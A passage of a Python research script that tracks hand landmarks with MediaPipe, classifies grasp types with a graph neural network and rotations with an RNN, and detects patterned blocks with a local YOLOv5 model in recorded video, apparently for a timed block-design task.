hand.landmark[mp_hands.HandLandmark.WRIST].y)),\r\n [640,480]).astype(int))\r\n \r\n output = text, coords\r\n \r\n return output\r\n\r\n\r\n\r\ndef draw_finger_angles(image, results, joint_list):\r\n \r\n # Loop through hands\r\n for hand in results.multi_hand_landmarks:\r\n #Loop through joint sets \r\n for joint in joint_list:\r\n\r\n point = np.array([hand.landmark[joint[1]].x, hand.landmark[joint[1]].y])\r\n \r\n a = np.array([hand.landmark[joint[0]].x, hand.landmark[joint[0]].y, hand.landmark[joint[0]].z]) # First coord\r\n b = np.array([hand.landmark[joint[1]].x, hand.landmark[joint[1]].y, hand.landmark[joint[1]].z]) # Second coord\r\n c = np.array([hand.landmark[joint[2]].x, hand.landmark[joint[2]].y, hand.landmark[joint[2]].z]) # Third coord\r\n\r\n vector_A = np.array( [ a[0]-b[0], a[1]-b[1] , a[2]-b[2] ])\r\n vector_B = np.array( [ c[0]-b[0], c[1]-b[1] , c[2]-b[2] ])\r\n\r\n length_A = math.sqrt( pow(a[0]-b[0],2) + pow(a[1]-b[1],2) + pow(a[2]-b[2],2) )\r\n length_B = math.sqrt( pow(c[0]-b[0],2) + pow(c[1]-b[1],2) + pow(c[2]-b[2],2) ) \r\n\r\n radians = math.acos( np.dot(vector_A, vector_B) / (length_A * length_B) )\r\n angle = np.abs(radians*180.0/np.pi)\r\n \r\n if angle > 180.0:\r\n angle = 360-angle\r\n \r\n cv2.putText(image, str(round(angle, 2)), tuple(np.multiply(point, [1920, 1080]).astype(int)),\r\n cv2.FONT_HERSHEY_SIMPLEX, 0.5, (50, 50, 50), 1, cv2.LINE_AA)\r\n return image\r\n\r\n\r\ndef get_finger_angles(results, joint_list):\r\n \r\n finger_angles=[]\r\n\r\n # Loop through hands\r\n for hand in results.multi_hand_landmarks:\r\n #Loop through joint sets \r\n \r\n joint_no = 1\r\n for joint in joint_list:\r\n\r\n a = np.array([hand.landmark[joint[0]].x, hand.landmark[joint[0]].y, hand.landmark[joint[0]].z]) # First coord\r\n b = np.array([hand.landmark[joint[1]].x, hand.landmark[joint[1]].y, hand.landmark[joint[1]].z]) # Second coord\r\n c = np.array([hand.landmark[joint[2]].x, hand.landmark[joint[2]].y, hand.landmark[joint[2]].z]) # Third coord\r\n \r\n vector_A = np.array( [ a[0]-b[0], a[1]-b[1] , a[2]-b[2] ])\r\n vector_B = np.array( [ c[0]-b[0], c[1]-b[1] , c[2]-b[2] ])\r\n\r\n length_A = math.sqrt( pow(a[0]-b[0],2) + pow(a[1]-b[1],2) + pow(a[2]-b[2],2) )\r\n length_B = math.sqrt( pow(c[0]-b[0],2) + pow(c[1]-b[1],2) + pow(c[2]-b[2],2) ) \r\n\r\n radians = math.acos( np.dot(vector_A, vector_B) / (length_A * length_B) )\r\n angle = np.abs(radians*180.0/np.pi)\r\n \r\n #if joint_no == 1 and angle < 90 :\r\n # angle = 90\r\n #elif joint_no == 2 and angle < 110 :\r\n # angle = 110\r\n #elif joint_no == 3 and angle < 90 :\r\n # angle = 90\r\n \r\n joint_no = joint_no + 1\r\n finger_angles.append(round(angle, 2))\r\n\r\n return finger_angles\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Model and File\r\n\r\n# Load Model\r\nPATH_MODEL = r\"C:\\ZOO_DATA\\MYCODE\\HAND\\YOLOv5-livinglab\\yolov5\\runs\\train\\exp7\\weights\\best.pt\"\r\nmodel_yolo = torch.hub.load(r'C:\\ZOO_DATA\\MYCODE\\HAND\\YOLOv5-livinglab\\yolov5', 'custom', path=PATH_MODEL, force_reload=True, source='local')\r\n\r\n#model_yolo = torch.hub.load('ultralytics/yolov5', 'custom', path=PATH_MODEL, force_reload=True)\r\n\r\n\r\n# Make Detection\r\n#PATH_VIDEO = r\"C:\\Users\\anomt\\Desktop\\BDT\\VIDEO_EXPERIMENT\\NCGG\\original\\01_top.mp4\" #top_view.mp4 tes03x\r\n#PATH_VIDEO = r\"C:\\Users\\anomt\\Desktop\\BDT\\VIDEO_EXPERIMENT\\NCGG\\reduce\\03_top.mp4\"\r\n#PATH_VIDEO = r\"C:\\Users\\anomt\\Desktop\\BDT\\VIDEO_GESTURE\\TUMB\\down_02.mp4\"\r\n\r\nPATH_VIDEO = r\"C:\\Users\\anomt\\Desktop\\BDT\\VIDEO_EXPERIMENT\\TLL\\TOP_VIEW\\anom_01.mp4\"\r\n\r\n#PATH_VIDEO = r\"C:\\Users\\anomt\\Desktop\\Block_Grasping.mp4\"\r\n#PATH_VIDEO = r\"C:\\Users\\anomt\\Desktop\\Rotation\\GRASP\\4.mp4\"\r\n\r\ncap = cv2.VideoCapture(PATH_VIDEO) # PATH_VIDEO 0\r\n\r\ncv2.namedWindow('Stream',cv2.WINDOW_NORMAL)\r\ncv2.resizeWindow('Stream', (960,540) ) #(960,540) (640,480)\r\n\r\nface_01 = cv2.imread(r\"C:\\Users\\anomt\\Desktop\\BDT\\FILES\\LABEL_50x50\\01.png\", cv2.IMREAD_COLOR)\r\nface_02 = cv2.imread(r\"C:\\Users\\anomt\\Desktop\\BDT\\FILES\\LABEL_50x50\\02.png\", cv2.IMREAD_COLOR)\r\nface_03 = cv2.imread(r\"C:\\Users\\anomt\\Desktop\\BDT\\FILES\\LABEL_50x50\\03.png\", cv2.IMREAD_COLOR)\r\nface_04 = cv2.imread(r\"C:\\Users\\anomt\\Desktop\\BDT\\FILES\\LABEL_50x50\\04.png\", cv2.IMREAD_COLOR)\r\nface_05 = cv2.imread(r\"C:\\Users\\anomt\\Desktop\\BDT\\FILES\\LABEL_50x50\\05.png\", cv2.IMREAD_COLOR)\r\nface_06 = cv2.imread(r\"C:\\Users\\anomt\\Desktop\\BDT\\FILES\\LABEL_50x50\\06.png\", cv2.IMREAD_COLOR)\r\n\r\n#size = 40\r\n#face_01 = cv2.resize(face_01, (size, size))\r\n#face_02 = cv2.resize(face_02, (size, size))\r\n#face_03 = cv2.resize(face_03, (size, size))\r\n#face_04 = cv2.resize(face_04, (size, size))\r\n#face_05 = cv2.resize(face_05, (size, size))\r\n#face_06 = cv2.resize(face_06, (size, size))\r\n\r\ngray_face_01 = cv2.cvtColor(face_01, cv2.COLOR_BGR2GRAY)\r\ngray_face_02 = cv2.cvtColor(face_02, cv2.COLOR_BGR2GRAY)\r\ngray_face_03 = cv2.cvtColor(face_03, cv2.COLOR_BGR2GRAY)\r\ngray_face_04 = cv2.cvtColor(face_04, cv2.COLOR_BGR2GRAY)\r\ngray_face_05 = cv2.cvtColor(face_05, cv2.COLOR_BGR2GRAY)\r\ngray_face_06 = cv2.cvtColor(face_06, cv2.COLOR_BGR2GRAY)\r\n\r\nret_01, mask_face_01 = cv2.threshold(gray_face_01, 1, 255, cv2.THRESH_BINARY)\r\nret_02, mask_face_02 = cv2.threshold(gray_face_02, 1, 255, cv2.THRESH_BINARY)\r\nret_03, mask_face_03 = cv2.threshold(gray_face_03, 1, 255, cv2.THRESH_BINARY)\r\nret_04, mask_face_04 = cv2.threshold(gray_face_04, 1, 255, cv2.THRESH_BINARY)\r\nret_05, mask_face_05 = cv2.threshold(gray_face_05, 1, 255, cv2.THRESH_BINARY)\r\nret_06, mask_face_06 = cv2.threshold(gray_face_06, 1, 255, cv2.THRESH_BINARY)\r\n\r\n####################\r\n\r\nimg_00 = cv2.imread(r'C:\\Users\\anomt\\Desktop\\BDT\\FILES\\TEST_100x100\\00.jpg')\r\nimg_01 = cv2.imread(r'C:\\Users\\anomt\\Desktop\\BDT\\FILES\\TEST_100x100\\01.jpg')\r\nimg_02 = cv2.imread(r'C:\\Users\\anomt\\Desktop\\BDT\\FILES\\TEST_100x100\\02.jpg')\r\nimg_03 = cv2.imread(r'C:\\Users\\anomt\\Desktop\\BDT\\FILES\\TEST_100x100\\03.jpg')\r\nimg_04 = cv2.imread(r'C:\\Users\\anomt\\Desktop\\BDT\\FILES\\TEST_100x100\\04.jpg')\r\nimg_05 = cv2.imread(r'C:\\Users\\anomt\\Desktop\\BDT\\FILES\\TEST_100x100\\05.jpg')\r\nimg_06 = cv2.imread(r'C:\\Users\\anomt\\Desktop\\BDT\\FILES\\TEST_100x100\\06.jpg')\r\nimg_07 = cv2.imread(r'C:\\Users\\anomt\\Desktop\\BDT\\FILES\\TEST_100x100\\07.jpg')\r\nimg_08 = cv2.imread(r'C:\\Users\\anomt\\Desktop\\BDT\\FILES\\TEST_100x100\\08.jpg')\r\nimg_09 = cv2.imread(r'C:\\Users\\anomt\\Desktop\\BDT\\FILES\\TEST_100x100\\09.jpg')\r\n\r\ngray_img_00 = cv2.cvtColor(img_00, cv2.COLOR_BGR2GRAY)\r\ngray_img_01 = cv2.cvtColor(img_01, cv2.COLOR_BGR2GRAY)\r\ngray_img_02 = cv2.cvtColor(img_02, cv2.COLOR_BGR2GRAY)\r\ngray_img_03 = cv2.cvtColor(img_03, cv2.COLOR_BGR2GRAY)\r\ngray_img_04 = cv2.cvtColor(img_04, cv2.COLOR_BGR2GRAY)\r\ngray_img_05 = cv2.cvtColor(img_05, cv2.COLOR_BGR2GRAY)\r\ngray_img_06 = cv2.cvtColor(img_06, cv2.COLOR_BGR2GRAY)\r\ngray_img_07 = cv2.cvtColor(img_07, cv2.COLOR_BGR2GRAY)\r\ngray_img_08 = cv2.cvtColor(img_08, cv2.COLOR_BGR2GRAY)\r\ngray_img_09 = cv2.cvtColor(img_09, cv2.COLOR_BGR2GRAY)\r\n\r\nret_img_00, mask_img_00 = cv2.threshold(gray_img_00, 1, 255, cv2.THRESH_BINARY)\r\nret_img_01, mask_img_01 = cv2.threshold(gray_img_01, 1, 255, cv2.THRESH_BINARY)\r\nret_img_02, mask_img_02 = cv2.threshold(gray_img_02, 1, 255, cv2.THRESH_BINARY)\r\nret_img_03, mask_img_03 = cv2.threshold(gray_img_03, 1, 255, cv2.THRESH_BINARY)\r\nret_img_04, mask_img_04 = cv2.threshold(gray_img_04, 1, 255, cv2.THRESH_BINARY)\r\nret_img_05, mask_img_05 = cv2.threshold(gray_img_05, 1, 255, cv2.THRESH_BINARY)\r\nret_img_06, mask_img_06 = cv2.threshold(gray_img_06, 1, 255, cv2.THRESH_BINARY)\r\nret_img_07, mask_img_07 = cv2.threshold(gray_img_07, 1, 255, cv2.THRESH_BINARY)\r\nret_img_08, mask_img_08 = cv2.threshold(gray_img_08, 1, 255, cv2.THRESH_BINARY)\r\nret_img_09, mask_img_09 = cv2.threshold(gray_img_09, 1, 255, cv2.THRESH_BINARY)\r\n\r\n####################\r\n\r\nn_frame = 0 \r\nn_capture = 1 # Normal 3 # Realtime 7\r\n#n_contour = 0\r\nn_test = 0\r\n\r\ntimer_task_all = []\r\ntimer_return = 0\r\n\r\ntimer_task_01 = 0\r\ntimer_task_02 = 0\r\ntimer_task_03 = 0\r\ntimer_task_03 = 0\r\ntimer_task_04 = 0\r\ntimer_task_05 = 0\r\ntimer_task_06 = 0\r\ntimer_task_07 = 0\r\ntimer_task_08 = 0\r\n\r\ntimer_flag_01 = True\r\ntimer_flag_02 = True\r\ntimer_flag_03 = True\r\ntimer_flag_04 = True\r\ntimer_flag_05 = True\r\ntimer_flag_06 = True\r\ntimer_flag_07 = True\r\ntimer_flag_08 = True\r\n\r\nans_01 = [2,1,1,2]\r\nans_02 = [1,3,1,1]\r\nans_03 = [2,2,3,4]\r\nans_04 = [5,1,4,1]\r\nans_05 = [4,3,5,6]\r\nans_06 = [1,4,6,1]\r\nans_07 = [5,6,4,3]\r\nans_08 = [5,3,4,5]\r\n\r\ngrasp_pose = [0,0,0,0,0,0,0]\r\n\r\nstart_zero = time.time()\r\nstart = time.time()\r\n\r\n\r\n\r\nwith mp_hands.Hands(min_detection_confidence=0.8, min_tracking_confidence=0.5) as hands:\r\n\r\n while cap.isOpened():\r\n\r\n ret, frame = cap.read()\r\n if not ret:\r\n break\r\n\r\n ret, frame_next = cap.read()\r\n\r\n if ret:\r\n \r\n f_height, f_width, f_channel = frame.shape\r\n\r\n #width = 960 # int(img.shape[1] * scale_percent / 100) \r\n #height = 540 # int(img.shape[0] * scale_percent / 100)\r\n #dim = (width, height)\r\n #frame = cv2.resize(frame, dim, interpolation = cv2.INTER_AREA)\r\n\r\n if(n_frame % n_capture == 0 ):\r\n\r\n #>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Hand Detection\r\n\r\n timer_task = round (time.time() - start , 2)\r\n\r\n grasp_type = None\r\n rotate_type = None \r\n box_near_hand = None\r\n\r\n task_state = 0\r\n thumb_state = 0\r\n\r\n\r\n # Brightness and Contrast\r\n #alpha = 1.5\r\n #beta = 5\r\n #frame = cv2.addWeighted(frame, alpha, np.zeros(frame.shape, frame.dtype), 0, beta)\r\n \r\n # BGR 2 RGB\r\n frame_hand = cv2.cvtColor(frame_next, cv2.COLOR_BGR2RGB)\r\n # Set flag\r\n frame_hand.flags.writeable = False\r\n # Hand Detections\r\n results = hands.process(frame_hand)\r\n # Set flag to true\r\n frame_hand.flags.writeable = True\r\n # RGB 2 BGR\r\n frame_hand = cv2.cvtColor(frame_hand, cv2.COLOR_RGB2BGR)\r\n\r\n hand_status = False\r\n hand_angle = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]\r\n hand_position = [0,0,0,0,0,0,0,0,0]\r\n stream = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]\r\n\r\n list_hand_x = []\r\n list_hand_y = []\r\n \r\n ### If hand detected\r\n\r\n # Rendering results\r\n if results.multi_hand_landmarks:\r\n for num, hand in enumerate(results.multi_hand_landmarks):\r\n mp_drawing.draw_landmarks(frame, hand, mp_hands.HAND_CONNECTIONS, \r\n mp_drawing.DrawingSpec(color=(121, 22, 76), thickness=3, circle_radius=4),\r\n mp_drawing.DrawingSpec(color=(250, 44, 250), thickness=3, circle_radius=2),\r\n )\r\n \r\n # Render left or right detection\r\n #if get_label(num, hand, results):\r\n # text, coord = get_label(num, hand, results)\r\n # cv2.putText(image, text, coord, cv2.FONT_HERSHEY_SIMPLEX, 1, (50, 50, 50), 1, cv2.LINE_AA)\r\n \r\n hand_status = True\r\n\r\n ### Measure Angle \r\n # Draw angles to image from joint list\r\n draw_finger_angles(frame, results, joint_list_0)\r\n draw_finger_angles(frame, results, joint_list_1)\r\n draw_finger_angles(frame, results, joint_list_2)\r\n draw_finger_angles(frame, results, joint_list_3)\r\n draw_finger_angles(frame, results, joint_list_4)\r\n\r\n angle_0 = get_finger_angles(results, joint_list_0)\r\n angle_1 = get_finger_angles(results, joint_list_1)\r\n angle_2 = get_finger_angles(results, joint_list_2)\r\n angle_3 = get_finger_angles(results, joint_list_3)\r\n angle_4 = get_finger_angles(results, joint_list_4)\r\n\r\n hand_angle = [ angle_0[0], angle_0[1], angle_0[2],\r\n angle_1[0], angle_1[1], angle_1[2],\r\n angle_2[0], angle_2[1], angle_2[2], \r\n angle_3[0], angle_3[1], angle_3[2],\r\n angle_4[0], angle_4[1], angle_4[2] ]\r\n\r\n timer = round (time.time() - start_zero , 2) \r\n \r\n #writer_ang.writerow([ timer, timer_task, \r\n # angle_0[0], angle_0[1], angle_0[2],\r\n # angle_1[0], angle_1[1], angle_1[2],\r\n # angle_2[0], angle_2[1], angle_2[2], \r\n # angle_3[0], angle_3[1], angle_3[2],\r\n # angle_4[0], angle_4[1], angle_4[2], thumb_state ])\r\n\r\n #print( str(timer) + \" - \" + str(hand_angle) )\r\n\r\n ### Measure Distance\r\n \r\n # Create new variabel for wrist \r\n wrist = np.array( [hand.landmark[9].x, hand.landmark[9].y] )\r\n\r\n # Create new variabel for fingertip\r\n tip_0 = np.array([hand.landmark[4].x, hand.landmark[4].y] ) # , hand.landmark[4].z\r\n tip_1 = np.array([hand.landmark[8].x, hand.landmark[8].y] ) # , hand.landmark[8].z\r\n tip_2 = np.array([hand.landmark[12].x, hand.landmark[12].y] ) # , hand.landmark[12].z\r\n tip_3 = np.array([hand.landmark[16].x, hand.landmark[16].y] ) # , hand.landmark[16].z\r\n tip_4 = np.array([hand.landmark[20].x, hand.landmark[20].y] ) # , hand.landmark[20].z\r\n \r\n # Area of Hand\r\n \r\n for i in range(21):\r\n list_hand_x.append(hand.landmark[i].x)\r\n list_hand_y.append(hand.landmark[i].y)\r\n \r\n min_hand_x = int (min(list_hand_x) * f_width)\r\n min_hand_y = int (min(list_hand_y) * f_height)\r\n\r\n max_hand_x = int (max(list_hand_x) * f_width)\r\n max_hand_y = int (max(list_hand_y) * f_height)\r\n \r\n cv2.rectangle(frame, (min_hand_x, min_hand_y),(max_hand_x, max_hand_y), (255, 0, 0), 2) \r\n\r\n\r\n\r\n\r\n # Drawing circle in fingertip\r\n \"\"\"\r\n frame = cv2.circle(frame, ( int (hand.landmark[4].x * vwidth), \r\n int (hand.landmark[4].y * vheight)), \r\n radius=10, color=(0, 0, 100), thickness=-1)\r\n \r\n frame = cv2.circle(frame, ( int (hand.landmark[8].x * vwidth), \r\n int (hand.landmark[8].y * vheight)), \r\n radius=10, color=(0, 0, 100), thickness=-1)\r\n\r\n frame = cv2.circle(frame, ( int (hand.landmark[12].x * vwidth), \r\n int (hand.landmark[12].y * vheight)), \r\n radius=10, color=(0, 0, 100), thickness=-1)\r\n \r\n frame = cv2.circle(frame, ( int (hand.landmark[16].x * vwidth), \r\n int (hand.landmark[16].y * vheight)), \r\n radius=10, color=(0, 0, 100), thickness=-1)\r\n \r\n frame = cv2.circle(frame, ( int (hand.landmark[20].x * vwidth), \r\n int (hand.landmark[20].y * vheight)), \r\n radius=10, color=(0, 0, 100), thickness=-1)\r\n \"\"\"\r\n\r\n \r\n \r\n #>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> PREDICT ACTION\r\n\r\n #stream = stream.decode().split(',')\r\n #stream = [eval(i) for i in stream] #round((eval(i)/3.14), 2)\r\n\r\n stream[0] = angle_0[0] / 180\r\n stream[1] = angle_0[1] / 180\r\n stream[2] = angle_0[2] / 180\r\n stream[3] = angle_1[0] / 180\r\n stream[4] = angle_1[1] / 180\r\n stream[5] = angle_1[2] / 180\r\n stream[6] = angle_2[0] / 180\r\n stream[7] = angle_2[1] / 180\r\n stream[8] = angle_2[2] / 180\r\n stream[9] = angle_3[0] / 180\r\n stream[10] = angle_3[1] / 180\r\n stream[11] = angle_3[2] / 180\r\n stream[12] = angle_4[0] / 180\r\n stream[13] = angle_4[1] / 180\r\n stream[14] = angle_4[2] / 180\r\n\r\n x = torch.tensor([ [1],\r\n [stream[0]], [stream[1]], [stream[2]], \r\n [stream[3]], [stream[4]], [stream[5]],\r\n [stream[6]], [stream[7]], [stream[8]],\r\n [stream[9]], [stream[10]], [stream[11]],\r\n [stream[12]], [stream[13]], [stream[14]] ], dtype=torch.float)\r\n #print(x)\r\n \r\n data = Data(x=x, edge_index=edge_index.t().contiguous()) \r\n\r\n output_gnn = model_gnn(data.x, data.edge_index, data.batch) #\r\n predicted_gnn = (torch.max(torch.exp(output_gnn), 1)[1]).data.cpu().numpy()\r\n \r\n #predicted_gnn = torch.max(output_gnn, 1)\r\n\r\n probs = torch.nn.functional.softmax(output_gnn, dim=1)\r\n str_probs = str( format((torch.max(probs).item()*100),\".2f\") )\r\n\r\n if predicted_gnn.item() == 0:\r\n cv2.putText(frame, \"Rake \" + str_probs + \"%\" , (min_hand_x, max_hand_y), cv2.FONT_HERSHEY_SIMPLEX, 2, (255,255,255), 2)\r\n grasp_pose[0]+=1\r\n\r\n elif predicted_gnn.item() == 1:\r\n cv2.putText(frame, \"Palmar Grasp \" + str_probs + \"%\" , (min_hand_x, max_hand_y), cv2.FONT_HERSHEY_SIMPLEX, 2, (255,255,255), 2)\r\n grasp_pose[1]+=1\r\n\r\n elif predicted_gnn.item() == 2:\r\n cv2.putText(frame, \"Radial Palmar Grasp \" + str_probs + \"%\" , (min_hand_x, max_hand_y), cv2.FONT_HERSHEY_SIMPLEX, 2, (255,255,255), 2)\r\n grasp_pose[2]+=1\r\n\r\n elif predicted_gnn.item() == 3:\r\n cv2.putText(frame, \"Radial Digital Grasp \" + str_probs + \"%\" , (min_hand_x, max_hand_y), cv2.FONT_HERSHEY_SIMPLEX, 2, (255,255,255), 2)\r\n grasp_pose[3]+=1\r\n\r\n elif predicted_gnn.item() == 4:\r\n cv2.putText(frame, \"Inferior Pincher \" + str_probs + \"%\" , (min_hand_x, max_hand_y), cv2.FONT_HERSHEY_SIMPLEX, 2, (255,255,255), 2)\r\n grasp_pose[4]+=1\r\n \r\n elif predicted_gnn.item() == 5:\r\n cv2.putText(frame, \"Pincher \" + str_probs + \"%\" , (min_hand_x, max_hand_y), cv2.FONT_HERSHEY_SIMPLEX, 2, (255,255,255), 2) \r\n grasp_pose[5]+=1\r\n\r\n elif predicted_gnn.item() == 6:\r\n \r\n if hand.landmark[20].z > hand.landmark[4].z:\r\n cv2.putText(frame, \"Thumbs UP \" + str_probs + \"%\" , (min_hand_x, max_hand_y), cv2.FONT_HERSHEY_SIMPLEX, 2, (255,255,255), 2)\r\n thumb_state = 1\r\n\r\n else:\r\n cv2.putText(frame, \"Thumbs DOWN \" + str_probs + \"%\" , (min_hand_x, max_hand_y), cv2.FONT_HERSHEY_SIMPLEX, 2, (255,255,255), 2) \r\n thumb_state = -1 \r\n \r\n grasp_pose[6]+=1\r\n\r\n grasp_type = predicted_gnn.item()\r\n\r\n\r\n #>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> PREDICT ACTION\r\n\r\n # Feature Scaling\r\n coll_hand.append(hand_angle)\r\n\r\n if len(coll_hand) == sequence_length:\r\n\r\n x_data = np.array(list(coll_hand))\r\n x_train = sc_input.transform(x_data)\r\n x_train = torch.tensor(x_train, dtype=torch.float32).to(device)\r\n x_train = x_train[None, :, :]\r\n \r\n output_rnn = model_rnn(x_train)\r\n confidence_rnn, predicted_rnn = torch.max(output_rnn.data, 1)\r\n \r\n str_conf = str( format(confidence_rnn.item()*10,\".2f\") )\r\n '''\r\n if predicted_rnn.item() == 0:\r\n cv2.putText(frame, \"No Rotation \" + str_conf + \"%\", (150, 150), cv2.FONT_HERSHEY_SIMPLEX, 2, (255,255,255), 2)\r\n elif predicted_rnn.item() == 1:\r\n cv2.putText(frame, \"Rotate Type 1 \" + str_conf + \"%\", (150, 150), cv2.FONT_HERSHEY_SIMPLEX, 2, (255,255,255), 2)\r\n elif predicted_rnn.item() == 2:\r\n cv2.putText(frame, \"Rotate Type 2 \" + str_conf + \"%\", (150, 150), cv2.FONT_HERSHEY_SIMPLEX, 2, (255,255,255), 2)\r\n elif predicted_rnn.item() == 3:\r\n cv2.putText(frame, \"Rotate Type 3 \" + str_conf + \"%\", (150, 150), cv2.FONT_HERSHEY_SIMPLEX, 2, (255,255,255), 2)\r\n elif predicted_rnn.item() == 4:\r\n cv2.putText(frame, \"Rotate Type 4 \" + str_conf + \"%\", (150, 150), cv2.FONT_HERSHEY_SIMPLEX, 2, (255,255,255), 2)\r\n elif predicted_rnn.item() == 5:\r\n cv2.putText(frame, \"Rotate Type 5 \" + str_conf + \"%\", (150, 150), cv2.FONT_HERSHEY_SIMPLEX, 2, (255,255,255), 2)\r\n elif predicted_rnn.item() == 6:\r\n cv2.putText(frame, \"Rotate Type 6 \" + str_conf + \"%\", (150, 150), cv2.FONT_HERSHEY_SIMPLEX, 2, (255,255,255), 2) #+ str_conf + \"%\"\r\n '''\r\n rotate_type = predicted_rnn.item()\r\n #print(predicted.item())\r\n\r\n\r\n\r\n\r\n\r\n #>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Block Detection\r\n\r\n # Frame threshold \r\n imgBlur = cv2.GaussianBlur(frame, (7,7), 1)\r\n imgGray = cv2.cvtColor(imgBlur, cv2.COLOR_BGR2GRAY)\r\n ret, imgThres = cv2.threshold(imgGray, 195, 255, cv2.THRESH_BINARY)\r\n \r\n # Make detections \r\n results = model_yolo(frame_next)\r\n\r\n df_tracked_objects = results.pandas().xyxy[0]\r\n list_tracked_objects = df_tracked_objects.values.tolist()\r\n #print(list_tracked_objects)\r\n \r\n #if len(list_tracked_objects) == 4: #>0\r\n\r\n box_num = 0\r\n box_face = 0\r\n box_list = []\r\n box_design = []\r\n box_distance = []\r\n box_design_sort = []\r\n\r\n box_near_hand = []\r\n #avg_confidence = []\r\n\r\n pos_x = []\r\n pos_y = []\r\n\r\n for x1, y1, x2, y2, conf_pred, cls_id, cls in list_tracked_objects:\r\n\r\n if conf_pred > 0.8:\r\n\r\n #avg_confidence.append( round(conf_pred,2) )\r\n\r\n center_x = int ((x1+x2)/2)\r\n center_y = int ((y1+y2)/2)\r\n x1 = int(x1)\r\n x2 = int(x2)\r\n y1 = int(y1)\r\n y2 = int(y2)\r\n w = int (x2-x1)\r\n h = int (y2-y1)\r\n\r\n box_distance.append( int (math.sqrt( pow(center_x, 2) + pow(center_y, 2) )) )\r\n #print(center_x, center_y)\r\n\r\n pos_x.append( int (center_x) )\r\n pos_y.append( int (center_y) )\r\n \r\n dim = (100, 100)\r\n imgBox = cv2.resize(imgThres[y1:y2, x1:x2], dim, interpolation = cv2.INTER_AREA)\r\n #cv2.imshow(\"Box_\"+str(box_num), imgBox)\r\n \r\n box_class = [ imgBox[50,25], imgBox[75,50], imgBox[50,75], imgBox[25,50] ]\r\n\r\n if box_class == [0,0,0,0] :\r\n box_face = 1\r\n box_design.append(1)\r\n elif box_class == [255,255,255,255]:\r\n box_face = 2\r\n box_design.append(2)\r\n #... dipisah\r\n elif box_class == [255,255,0,0]:\r\n box_face = 3\r\n box_design.append(3) \r\n elif box_class == [255,0,0,255]:\r\n box_face = 4\r\n box_design.append(4) \r\n elif box_class == [0,0,255,255]:\r\n box_face = 5\r\n box_design.append(5) \r\n elif box_class == [0,255,255,0]:\r\n box_face = 6\r\n box_design.append(6) \r\n \r\n cv2.rectangle(frame, (x1,y1), (x1+w, y1+h), (0, 255, 0), 2)\r\n\r\n # Select Block Inside Hand\r\n\r\n if hand_status == True:\r\n if (center_x > min_hand_x-150 and center_x < max_hand_x+150 ) and (center_y > min_hand_y-150 and center_y < max_hand_y+150):\r\n cv2.rectangle(frame, (x1,y1), (x1+w, y1+h), (0, 0, 255), 5)\r\n box_near_hand.append(box_face)\r\n #print(box_face)\r\n #else:\r\n # print(0)\r\n #else:\r\n # print(0)\r\n \r\n cv2.putText(frame, str(round(conf_pred,2)), (int(x1), int(y1) - 10), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 0), 2)\r\n #cv2.putText(frame, \"id:\" +str(box_num), (int(x1), int(y1) - 10), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 0), 2)\r\n\r\n box_num = box_num + 1\r\n roi_label = frame[y1:y1+50, x1:x1+50]\r\n\r\n if(box_face == 1):\r\n roi_label [np.where(mask_face_01)] = 0\r\n roi_label += face_01\r\n elif(box_face == 2):\r\n roi_label [np.where(mask_face_02)] = 0\r\n roi_label += face_02\r\n elif(box_face == 3):\r\n roi_label [np.where(mask_face_03)] = 0\r\n roi_label += face_03\r\n elif(box_face == 4):\r\n roi_label [np.where(mask_face_04)] = 0\r\n roi_label += face_04\r\n elif(box_face == 5):\r\n roi_label [np.where(mask_face_05)] = 0\r\n roi_label += face_05\r\n elif(box_face == 6):\r\n roi_label [np.where(mask_face_05)] = 0\r\n roi_label += face_06\r\n \r\n # Draw objects features\r\n #cv2.circle(frame, (x, y), radius=5, color=(0, 255, 0), thickness=-1)\r\n #cv2.rectangle(frame, (int(x1), int(y1)), (int(x2), int(y2)), (0, 255, 0), 2)\r\n #cv2.putText(frame, cls , (int(x1), int(y1) - 10), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 0), 2)\r\n\r\n #print(box_design)\r\n #print (box_near_hand)\r\n\r\n \r\n\r\n\r\n if len(box_design) == 4 and len(box_distance) == 4:\r\n\r\n # >>>>>>>>>>>>\r\n\r\n box_0 = (pos_x[0], pos_y[0])\r\n box_1 = (pos_x[1], pos_y[1])\r\n box_2 = (pos_x[2], pos_y[2])\r\n box_3 = (pos_x[3], pos_y[3])\r\n\r\n frame = cv2.line(frame, box_0, box_1, (0, 0, 0), 2)\r\n frame = cv2.line(frame, box_0, box_2, (0, 0, 0), 2)\r\n frame = cv2.line(frame, box_0, box_3, (0, 0, 0), 2)\r\n frame = cv2.line(frame, box_1, box_2, (0, 0, 0), 2)\r\n frame = cv2.line(frame, box_1, box_3, (0, 0, 0), 2)\r\n frame = cv2.line(frame, box_2, box_3, (0, 0, 0), 2)\r\n\r\n pos_x_order = [ pos_x[0], pos_x[1], pos_x[2], pos_x[3] ]\r\n pos_y_order = [ pos_y[0], pos_y[1], pos_y[2], pos_y[3] ]\r\n\r\n #if ( abs(pos_x[0] - pos_x[1]) < 100) and \\\r\n # ( abs(pos_x[0] - pos_x[2]) < 100) and \\\r\n # ( abs(pos_x[0] - pos_x[3]) < 100) and \\\r\n # ( abs(pos_x[1] - pos_x[2]) < 100) and \\\r\n # ( abs(pos_x[1] - pos_x[3]) < 100) and \\\r\n # ( abs(pos_x[2] - pos_x[3]) < 100):\r\n\r\n # start = time.time()\r\n \r\n #elif( abs(pos_y[0] - pos_y[1]) < 100) and \\\r\n # ( abs(pos_y[0] - pos_y[2]) < 100) and \\\r\n # ( abs(pos_y[0] - pos_y[3]) < 100) and \\\r\n # ( abs(pos_y[1] - pos_y[2]) < 100) and \\\r\n # ( abs(pos_y[1] - pos_y[3]) < 100) and 